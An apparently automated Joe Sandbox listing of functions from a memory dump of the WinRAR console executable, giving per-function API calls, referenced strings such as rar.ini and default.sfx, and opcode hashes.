Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: 8720db6e8526e7db0e855b592ae89f1c119c6eb63027404ad7f4b8b38c3570a6
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: 70119D32A28B5282EB619F22F4105AA7361FF98BC4F541531FA5E87B56EF3DD044D700

Function 00007FF60E5C7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9, xrefs: 00007FF60E5C7BF3

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID: H9
API String ID: 0-2207570329
Opcode ID: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
Instruction ID: 2caa61e928e47ce3511e550a7b6e0e4aabc974c867990f8dfcc2faab02309046
Opcode Fuzzy Hash: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
Instruction Fuzzy Hash: 70E1E562B08AA289EB16CB25E4647FD23A5FB6874CF654C32EE4D83785DF3AD544C700

Function 00007FF60E5E2574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF60E5E25B0
WriteFile.KERNEL32 ref: 00007FF60E5E25F9
WriteFile.KERNELBASE ref: 00007FF60E5E262E
GetLastError.KERNEL32 ref: 00007FF60E5E2658
SetLastError.KERNEL32 ref: 00007FF60E5E2689

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction ID: 2bcdc281c7aff1513ae979b2a3346a584c2c3e40c60b1d047826e460cd750814
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: A051E726B18A6283EA69DF21F52437A73A0FB64B40F240535FE4E87BA4DF3DE045C600

Function 00007FF60E5E1E80 Relevance: 7.6, APIs: 5, Instructions: 127
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF60E5E1F4A
GetLastError.KERNEL32 ref: 00007FF60E5E1F59
CreateFileW.KERNELBASE ref: 00007FF60E5E1F99
GetLastError.KERNEL32 ref: 00007FF60E5E1FA2
SetFileTime.KERNEL32 ref: 00007FF60E5E1FF1

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction ID: 0bc413714bf1c786b632f5b9a9808da9cd53d38bb4668ee6106e7639af2886bd
Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction Fuzzy Hash: 97417972A29AA106FB698B24E5147B96B90A7647B8F200734FE7D837C4DF7DC4458B40

Function 00007FF60E5D6AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E5D6C13

Strings

switches_%ls=, xrefs: 00007FF60E5D6C03
switches=, xrefs: 00007FF60E5D6B80
rar.ini, xrefs: 00007FF60E5D6B37

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: swprintf
String ID: rar.ini$switches=$switches_%ls=
API String ID: 233258989-2235180025
Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction ID: 30a9fb50a377ec2df98f04e361a7b01a2a8834ec228326b1cafef9269ecbd12a
Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction Fuzzy Hash: 1E41F625B2C66281FB21DB61E4601FA23A0FF647A4F600935FA5D87AD6EF7DD502C300

Function 00007FF60E5F7E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF60E60B470: GetModuleHandleW.KERNEL32 ref: 00007FF60E60B488
Part of subcall function 00007FF60E60B470: GetProcAddress.KERNEL32 ref: 00007FF60E60B4A0
Part of subcall function 00007FF60E60B470: GetProcAddress.KERNEL32 ref: 00007FF60E60B4D5

Part of subcall function 00007FF60E5D7A68: setbuf.LIBCMT ref: 00007FF60E5D7A7B
Part of subcall function 00007FF60E5D7A68: setbuf.LIBCMT ref: 00007FF60E5D7A8F

SetErrorMode.KERNELBASE ref: 00007FF60E5F7E5D
GetModuleHandleW.KERNEL32 ref: 00007FF60E5F7E65

Part of subcall function 00007FF60E6048CC: GetVersionExW.KERNEL32(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E60496A
Part of subcall function 00007FF60E6048CC: LoadLibraryExW.KERNELBASE(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E604993

new.LIBCMT ref: 00007FF60E5F7EA8

Strings

rar.lng, xrefs: 00007FF60E5F7E7D

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
String ID: rar.lng
API String ID: 553376247-2410228151
Opcode ID: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
Instruction ID: 16b7865f4ec589de1fc779c41f18c377edb57e66dd3f383cfbd4b9209f2b2dea
Opcode Fuzzy Hash: 39970e7c6d0227ca57f33f9c031fdb4e3bcfaef39f08ad794915361c5ea6dedb
Instruction Fuzzy Hash: 3841E525E2C6B345FA22AB60B8212B923A19F75754F380936F91EC73D7CE3EE4058700

Function 00007FF60E5F40A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(?,00000800,?,00007FF60E5F4432,?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F40C4
SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5F40DF
SHGetPathFromIDListW.SHELL32 ref: 00007FF60E5F40F1

Part of subcall function 00007FF60E5E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF60E5F413F,?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5E34A0
Part of subcall function 00007FF60E5E3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF60E5F413F,?,?,?,?,00000800,00000000,00000000,00007FF60E5F38CB,?,?,?,00007FF60E5F41EC), ref: 00007FF60E5E34D5

Strings

WinRAR, xrefs: 00007FF60E5F410F

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
String ID: WinRAR
API String ID: 977838571-3970807970
Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction ID: 2bcb59c45a89621f0a016c044b765cec805bcb05ee723976baaee7f0161fbd3b
Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction Fuzzy Hash: 5021C322B08B5280FA519F22F8501BB5360EFA9BD0F281031FF5E87366DE3DD4448700

Function 00007FF60E62978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E6297A5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E629807
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E629841
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF60E623CEF,?,?,00000000,00007FF60E623CAA,?,?,00000000,00007FF60E623FD9), ref: 00007FF60E62986B

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction ID: 511d2f45b14417eef6a4c0a0b335ec5ed67100abc57000eb17ae11e1d2abb17d
Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction Fuzzy Hash: F7213431E28B6181D6608F12B44012966A4FFF4BD0F6C4539FE9EA7B94DF3CD8519744

Function 00007FF60E5E1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00007FF60E5E21A7,00000000,00000028,?,00007FF60E5D7792), ref: 00007FF60E5E1C97
ReadFile.KERNELBASE ref: 00007FF60E5E1CB6
GetLastError.KERNEL32 ref: 00007FF60E5E1CEA
GetLastError.KERNEL32 ref: 00007FF60E5E1D08

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction ID: 16f868a57f794c0a6445cf4198f90b18749fe04d0ad72df352049c2a5e18312f
Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction Fuzzy Hash: AF21C321E19E7681FA698B21E21037963A0BF65B94F300931FA5DCB7C4EE3ED444C701

Function 00007FF60E5D49F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

AFUM, xrefs: 00007FF60E5D4B8C
default.sfx, xrefs: 00007FF60E5D4AB0

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID: AFUM$default.sfx
API String ID: 0-2491287583
Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction ID: 79da780f3aed4518d4d23a9d9b4b9f438f7f1e4bf4eca4a70abda0d8e1c767df
Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction Fuzzy Hash: A581D929E0C6B240FF729B1191602BD22A1AF71794F648831FEADC76D6DF7EA485C710

Function 00007FF60E6265BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF60E62662E
GetFileType.KERNELBASE ref: 00007FF60E626644

Strings

@, xrefs: 00007FF60E62666F

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction ID: d7361b289c2cc438789d347fdd5372c1e7e9c3d72a334cb9959fbb4160709ab1
Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction Fuzzy Hash: DB21B672A28B6241EB608B25F49013D2655EB75774F341339FA6E867D4CE38DC81E342

Function 00007FF60E60B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF60E60B9F8
SetThreadPriority.KERNEL32 ref: 00007FF60E60BA4E

Part of subcall function 00007FF60E5DCDA4: wcschr.LIBVCRUNTIME ref: 00007FF60E5DCE0F
Part of subcall function 00007FF60E5DCDA4: wcschr.LIBVCRUNTIME ref: 00007FF60E5DCE22

Part of subcall function 00007FF60E5DCA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF60E5DCEDE

Strings

CreateThread failed, xrefs: 00007FF60E60BA06

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: f8c0fb2b260e7ded1a6eedddfd79113baf3101136f7e38510412ec666377d435
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: 32119132A28A6282EB15EB20F8501BA7370FBA4794F648531F69D83669DF3CE546D700

Function 00007FF60E60BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF60E60BB79), ref: 00007FF60E60BBB9
SetEvent.KERNEL32 ref: 00007FF60E60BBCF
LeaveCriticalSection.KERNEL32 ref: 00007FF60E60BBD8

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
